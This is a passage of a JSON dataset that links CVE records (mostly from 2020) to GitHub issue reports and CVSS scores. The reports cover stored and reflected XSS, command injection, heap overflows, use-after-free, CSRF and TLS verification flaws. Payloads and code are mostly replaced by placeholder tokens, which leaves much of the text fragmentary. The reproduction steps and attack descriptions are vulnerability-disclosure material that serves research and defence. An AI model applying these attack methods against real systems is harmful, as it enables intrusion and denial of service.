        "description": "XSS and HTML Injection on Create Shopping List APITAG upon deleting it). Vulnerability Name: Stored Cross Site Scripting & HTML Injection Vulnerability Description: grocy household management solution NUMBERTAG allows stored XSS and HTML Injection, via Create Shopping List module, that is rendered upon deletiing that Shopping List. Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. HTML injection occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. Consequences can be disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. Vulnerable URL: URLTAG Payload NUMBERTAG APITAG NUMBERTAG APITAG HTML Injection APITAG Steps to Reproduce NUMBERTAG Login to the application NUMBERTAG Go to APITAG List' module NUMBERTAG Click on APITAG Shopping List' module NUMBERTAG Enter the payload: APITAG in APITAG input field NUMBERTAG Click Save NUMBERTAG Click APITAG Shopping List' Request: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content type: application/json Content Length NUMBERTAG Connection: close Cookie: APITAG {\"name\":\" APITAG \"}",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-15254",
        "Issue_Url_old": "https://github.com/crossbeam-rs/crossbeam/issues/539",
        "Issue_Url_new": "https://github.com/crossbeam-rs/crossbeam/issues/539",
        "Repo_new": "crossbeam-rs/crossbeam",
        "Issue_Created_At": "2020-08-03T20:42:22Z",
        "description": "Memory Leak in crossbeam queue APITAG APITAG git only, ver NUMBERTAG is not effected). Hi. I'm Yoshi, a APITAG student at CMU. We are currently evaluating a project that aims to automatically synthesize test cases for Rust libraries. We ran the synthesized test cases with Miri, and it reports what appears to be a memory leak. The minimum example is: APITAG ERRORTAG It looks like the drop destructor is not erasing enough memory. You can also catch this with by running cargo miri test inside crossbeam queue. One of your manually written test cases ( capacity ) will induce the same behavior. The first commit to have this issue is APITAG URLTAG . You can confirm this by running cargo miri test on NUMBERTAG commit before. It will not terminate because Miri is extremely slow, but you can see that it gets past capacity test case. As for the root cause, I suspect that the drop function needs to be modified to match the changes to new , but I am yet to get a PR up. In case this is intended behavior, or you would prefer if I focused on other parts of the code, please let me know. Thanks APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15261",
        "Issue_Url_old": "https://github.com/veyon/veyon/issues/657",
        "Issue_Url_new": "https://github.com/veyon/veyon/issues/657",
        "Repo_new": "veyon/veyon",
        "Issue_Created_At": "2020-09-01T06:12:58Z",
        "description": "Unquoted service path. Hi Veyon team, After installing Veyon NUMBERTAG I noticed that its service, APITAG is hijackable due to the unquoted service path. Using this vulnerability, attackers can execute different files as APITAG It allows local users to replace the service with arbitrary code to escalate their privileges. I hope you check this link for more details: CVETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.7,
        "impactScore": 5.9,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2020-15262",
        "Issue_Url_old": "https://github.com/waysact/webpack-subresource-integrity/issues/131",
        "Issue_Url_new": "https://github.com/waysact/webpack-subresource-integrity/issues/131",
        "Repo_new": "waysact/webpack-subresource-integrity",
        "Issue_Created_At": "2020-10-18T00:48:41Z",
        "description": "Tags are injected with integrity=\"undefined\" on NUMBERTAG I'm on Webpack NUMBERTAG and noticed after upgrading to this plugin's NUMBERTAG release that injected tags have an ERRORTAG integrity. Tags inserted by via html webpack plugin have the correct integrity so the app doesn't fail to load, but dynamically injected tags use ERRORTAG and the integrity check is bypassed. Here's what Firefox prints: ERRORTAG Downgrading to NUMBERTAG fixes this issue so I'm assuming it's related to the changes that added Webpack NUMBERTAG support in NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-15265",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/42105",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/42105",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2020-08-06T20:40:42Z",
        "description": "Segmentation fault in APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG rc NUMBERTAG g2b NUMBERTAG f NUMBERTAG b NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG produces a segfault when input is a tensor in any shape of APITAG or APITAG and axis is specified to a large number. Describe the expected behavior No segfault Standalone code to reproduce the issue APITAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15266",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/42129",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/42129",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2020-08-07T15:04:14Z",
        "description": "segfault in APITAG when boxes contains large value. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG rc NUMBERTAG g2b NUMBERTAG f NUMBERTAG b NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG segfault when there is a very large value in boxes . Can also be reproduced in nightly version Describe the expected behavior Expect no segfault Standalone code to reproduce the issue ~~~python import tensorflow as tf APITAG APITAG NUMBERTAG box_indices NUMBERTAG crop_size NUMBERTAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. ~~~python Segmentation fault (core dumped) ~~~",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15362",
        "Issue_Url_old": "https://github.com/thingsSDK/wifiscanner/issues/1",
        "Issue_Url_new": "https://github.com/thingssdk/wifiscanner/issues/1",
        "Repo_new": "thingssdk/wifiscanner",
        "Issue_Created_At": "2020-06-11T03:20:43Z",
        "description": "Remote Code Execution Bug due to Improper Input Sanitization. This module can be used with options that can be used to overwrite default executable/binary path and arguments to the said executable/binary. An attacker can abuse this functionality to have the module execute a binary of their choice. The following code snippets in the FILETAG is responsible for the issue. ERRORTAG As we can see, _ APITAG _ is not sanitized in anyway prior to being passed to the APITAG . Hence, the following payloads can be used to execute arbitrary commands: Exploit NUMBERTAG ERRORTAG Exploit NUMBERTAG ERRORTAG User input must be appropriately sanitized prior to being passed to the module. At the very least users must be advised to manually sanitize user inputs when using this module.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15365",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/301",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/301",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2020-06-15T14:19:19Z",
        "description": "Libraw APITAG Out of bounds write vulnerability. Description An out of bounds write vulnerability exists within the APITAG function ( PATHTAG ) which can be triggered by changing the APITAG from \"CMT1\" to an unknown name and making the \"tiff_nifds\" field equals zero. Steps to Reproduce (poc archive password= girlelecta). URLTAG cmd: FILETAG convert poc.cr3 FILETAG Upon running this, following crash happens only in APITAG NUMBERTAG APITAG I enabled page heap on FILETAG ): Microsoft (R) Windows Debugger Version NUMBERTAG AMD NUMBERTAG Copyright (c) Microsoft Corporation. All rights reserved. APITAG PATHTAG convert e:\\poc.cr3 FILETAG Path validation summary Response Time (ms) Location Deferred srv Symbol search path is: srv Executable search path is: APITAG NUMBERTAG ff7 APITAG NUMBERTAG a NUMBERTAG FILETAG APITAG NUMBERTAG ffc APITAG ef NUMBERTAG ntdll.dll APITAG NUMBERTAG ffc APITAG d4dc NUMBERTAG PATHTAG Page heap: pid NUMBERTAG page heap enabled with flags NUMBERTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ea NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cb2ab NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cafeb NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ecb3e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG edd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eee3e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee5ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ca9ef NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG cd6a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d2f NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d4ce NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG d NUMBERTAG ba NUMBERTAG PATHTAG APITAG NUMBERTAG a2 APITAG eed0a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG edcd NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eecc NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed4b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed2be NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec4ca NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ec NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ed2d NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eb NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eba2b NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG eed NUMBERTAG PATHTAG APITAG Break instruction exception code NUMBERTAG first chance) APITAG NUMBERTAG ffc ef NUMBERTAG c cc int NUMBERTAG g APITAG NUMBERTAG ffc APITAG eed7e NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG e NUMBERTAG af NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG c NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ffc APITAG ca7f NUMBERTAG PATHTAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. WARNING: Unable to verify checksum for PATHTAG APITAG NUMBERTAG ffc APITAG f3b2d NUMBERTAG c NUMBERTAG k Child SP APITAG Call Site NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG ee APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG d APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG f NUMBERTAG d APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG d0bf5 APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG a NUMBERTAG de APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG ab NUMBERTAG APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG bdfc8 APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG f APITAG e NUMBERTAG a NUMBERTAG APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG f APITAG c NUMBERTAG c6c NUMBERTAG APITAG PATHTAG NUMBERTAG f APITAG c NUMBERTAG c NUMBERTAG a3 APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for PATHTAG NUMBERTAG a NUMBERTAG f APITAG cae5aac3 APITAG PATHTAG NUMBERTAG b NUMBERTAG f APITAG caef NUMBERTAG ae APITAG PATHTAG NUMBERTAG WARNING: Unable to verify checksum for magick.exe NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG ea APITAG PATHTAG NUMBERTAG d NUMBERTAG f APITAG NUMBERTAG APITAG PATHTAG NUMBERTAG e NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG magick!wmain NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f APITAG NUMBERTAG e NUMBERTAG magick!invoke_main NUMBERTAG PATHTAG NUMBERTAG f APITAG NUMBERTAG cfe APITAG PATHTAG NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG magick!__scrt_common_main NUMBERTAG e PATHTAG NUMBERTAG f APITAG ee NUMBERTAG bd4 APITAG PATHTAG NUMBERTAG f APITAG ef5ace NUMBERTAG APITAG NUMBERTAG f APITAG NUMBERTAG APITAG NUMBERTAG u APITAG PATHTAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG a e NUMBERTAG b NUMBERTAG jmp APITAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG mov edx,dword ptr [rsp NUMBERTAG h NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG b e NUMBERTAG ddfbff call APITAG NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG f NUMBERTAG f5ac0 cvtsd2ss xmm0,xmm NUMBERTAG ffc APITAG c NUMBERTAG f NUMBERTAG c f NUMBERTAG f NUMBERTAG ef NUMBERTAG movss dword ptr [ra NUMBERTAG EF NUMBERTAG h],xmm0 System Configuration APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG License: FILETAG Environment APITAG system, version and so on): Distributor ID: Microsoft Windows Description: Windows NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15389",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1261",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1261",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2020-06-28T10:06:42Z",
        "description": "Heap use after free. There is a heap use after free vulnerability in PATHTAG I would also like to request a CVE if that's okay or I can do it myself if you're busy, no worries. Here is the ASAN output: FILETAG Here is the command executed to reproduce the issue: ./opj_decompress APITAG Inputs/ APITAG PGM If you would also like the files I have in the Inputs/, let me know and I can find a way to provide them.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 4.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-15470",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/26",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/26",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2020-06-30T05:18:26Z",
        "description": "ffjpeg APITAG function heap overflow vulnerability. ffjpeg APITAG function heap overflow vulnerability Description: There is a heap overflow bug in jfif_decode(void ctxt, BMP pb) function at PATHTAG : line NUMBERTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. The bug is caused by the following dangerous memcpy calling in APITAG function: for (i NUMBERTAG i APITAG NUMBERTAG bebebebebebebebe RB NUMBERTAG fffffffdd NUMBERTAG e NUMBERTAG RC NUMBERTAG fffffffdbc NUMBERTAG ad NUMBERTAG c NUMBERTAG af NUMBERTAG c RD NUMBERTAG RSI NUMBERTAG fffffffdbc NUMBERTAG ad NUMBERTAG c NUMBERTAG af NUMBERTAG c RDI NUMBERTAG ffff NUMBERTAG ff NUMBERTAG bebebebebebebebe RBP NUMBERTAG fffffffe3d NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : movsxd rcx,DWORD PTR [rb NUMBERTAG RIP NUMBERTAG ffffffffcd4a5e NUMBERTAG R NUMBERTAG c2a NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b NUMBERTAG f3f3f3f3f3f3f3f3 R NUMBERTAG fff7b NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b4c NUMBERTAG f1f1f1f NUMBERTAG R NUMBERTAG ffff NUMBERTAG ffee EFLAGS NUMBERTAG CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4a5e NUMBERTAG stack NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : movsxd rcx,DWORD PTR [rb NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffda NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_height NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : push rbp NUMBERTAG fffffffda NUMBERTAG a NUMBERTAG fffffffda NUMBERTAG c NUMBERTAG c7b NUMBERTAG d NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG e NUMBERTAG fffffffda NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4a5e NUMBERTAG in ?? () We ensured there is a heap overflow because of the dangerous using of memcpy function, attacker can use this bug to finish a APITAG attack. You can reproduce this heap overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-15500",
        "Issue_Url_old": "https://github.com/maptiler/tileserver-gl/issues/461",
        "Issue_Url_new": "https://github.com/maptiler/tileserver-gl/issues/461",
        "Repo_new": "maptiler/tileserver-gl",
        "Issue_Created_At": "2020-07-01T17:12:34Z",
        "description": "Reflected XSS vulnerability in the application main page. Hi, I stumbled upon a reflected XSS in the software. It stems from reflecting unsanitized user controller input directly to the HTTP response. I initially observed this in Tileserver GL NUMBERTAG but from the looks of it it's still present in the current master . Vulnerable request example: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15502",
        "Issue_Url_old": "https://github.com/duckduckgo/Android/issues/527",
        "Issue_Url_new": "https://github.com/duckduckgo/android/issues/527",
        "Repo_new": "duckduckgo/android",
        "Issue_Created_At": "2019-07-09T13:02:51Z",
        "description": "Domains visited get leaked to DDG servers. URLTAG This seems to be leaking all(?) the domains that users visit to your servers.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15600",
        "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/15",
        "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/15",
        "Repo_new": "boiteasite/cmsuno",
        "Issue_Created_At": "2020-05-30T21:38:48Z",
        "description": "CSRF Vulnerability. Hi ~ I find a CSRF Vulnerability ! Version NUMBERTAG Author : Noth(\u6c88\u5f67\u74bf) Step NUMBERTAG go to FILETAG Step NUMBERTAG Use burpsuite to intercept packets Step NUMBERTAG Generate APITAG FILETAG Test Video : URLTAG No CSRF Token so that can login to the system .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15688",
        "Issue_Url_old": "https://github.com/embedthis/goahead-gpl/issues/3",
        "Issue_Url_new": "https://github.com/embedthis/goahead-gpl/issues/3",
        "Repo_new": "embedthis/goahead-gpl",
        "Issue_Created_At": "2020-07-15T22:40:59Z",
        "description": "Digest Nonce Handling over HTTP. Overview A security vulnerability affecting APITAG versions NUMBERTAG to NUMBERTAG has been identified when using Digest authentication over HTTP. Summary A Digest authentication vulnerability has been identified due to handling of the digest \"nonce\" value. This may permit request replay for local requests over HTTP. Detail Digest authentication uses a \"nonce\" value to mitigate replay attacks. APITAG version NUMBERTAG did not validate this nonce value. APITAG versions NUMBERTAG to NUMBERTAG alidated the nonce with a fixed duration of NUMBERTAG minutes which permitted short period replays. Threat Scope An attacker with local access to traffic on HTTP networks could capture a request and replay that request. For APITAG NUMBERTAG to NUMBERTAG this replay must happen inside the NUMBERTAG minutes. Severity An attacker with access to traffic on HTTP networks could capture a request and replay that request. This could lead to unauthorized access to the service. Remedy Deploy APITAG NUMBERTAG or NUMBERTAG or later and configure ME_GOAHEAD_NONCE_DURATION to be suitably short for your needs. Advice The ME_GOAHEAD_NONCE_DURATION should be only long enough for your user to login. Further, if you must use Digest authentication you should use this only over HTTPS to eliminate the possibility of an attacker capturing and replaying the request during the ME_GOAHEAD_NONCE_DURATION period. Embedthis strongly discourages the use of Digest (and Basic) authentication. They are inherently insecure as you cannot reliably implement logout. Use form / HTTP based authentication over HTTPS with suitable ciphers such as bcrypt. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG . CVE CVETAG NVD: CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15689",
        "Issue_Url_old": "https://github.com/embedthis/appweb-gpl/issues/2",
        "Issue_Url_new": "https://github.com/embedthis/appweb-gpl/issues/2",
        "Repo_new": "embedthis/appweb-gpl",
        "Issue_Created_At": "2020-05-25T23:01:39Z",
        "description": "Appweb Security Alerts. Appweb Security Alerts Notification Alert Log for Appweb security issues. Subscribe to be notified when alerts are posted to log.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15807",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/186",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/186",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-01-14T12:30:37Z",
        "description": "NULL pointer deference. Hello, I got a NULL pointer deference bug by run APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15807",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/189",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/189",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-01-16T11:36:57Z",
        "description": "Some NULL pointer bugs. Hi, I got some bugs which you can reproduce APITAG APITAG bugs work on version APITAG and earlier .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15807",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/190",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/190",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-01-16T11:51:56Z",
        "description": "Some heap_overflow bug. Hi, I got some bugs which you can reproduce APITAG APITAG bugs work on version APITAG and earlier .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15813",
        "Issue_Url_old": "https://github.com/Graylog2/graylog2-server/issues/5906",
        "Issue_Url_new": "https://github.com/graylog2/graylog2-server/issues/5906",
        "Repo_new": "graylog2/graylog2-server",
        "Issue_Created_At": "2019-04-24T14:39:48Z",
        "description": "LDAP connector does not verify TLS certificates. Expected Behavior Graylog should verify the LDAP server certificate chain up to a trusted root, and refuse the connection when the certificate chain cannot be verified. Current Behavior Graylog accepts LDAP server certificates whose root certificate is not in any trust store. This presents a vulnerability for man in the middle attacks. Possible Solution Steps to Reproduce (for bugs NUMBERTAG Navigate to the LDAP / Active Directory configuration page NUMBERTAG Enable LDAP, choose server type 'LDAP' and enter the address of a STARTTLS enabled LDAP server, whose TLS certificate should not be verifiable by the server. Uncheck 'SSL' and APITAG self signed certificates'. Check APITAG NUMBERTAG Provide a bind DN and password in the APITAG Username' and APITAG Password' fields NUMBERTAG Click the APITAG Server Connection' button. Context We run Graylog in a Docker container, using the official Docker image URLTAG . Our LDAP server is on a different network. We would be better protected against man in the middle attacks if Graylog verifies the LDAP server certificate. Your Environment Graylog Version NUMBERTAG Elasticsearch Version NUMBERTAG APITAG Version NUMBERTAG Operating System: Debian NUMBERTAG inside Graylog Docker container Browser version: Firefo NUMBERTAG esr",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-15861",
        "Issue_Url_old": "https://github.com/net-snmp/net-snmp/issues/145",
        "Issue_Url_new": "https://github.com/net-snmp/net-snmp/issues/145",
        "Repo_new": "net-snmp/net-snmp",
        "Issue_Created_At": "2020-07-09T09:32:21Z",
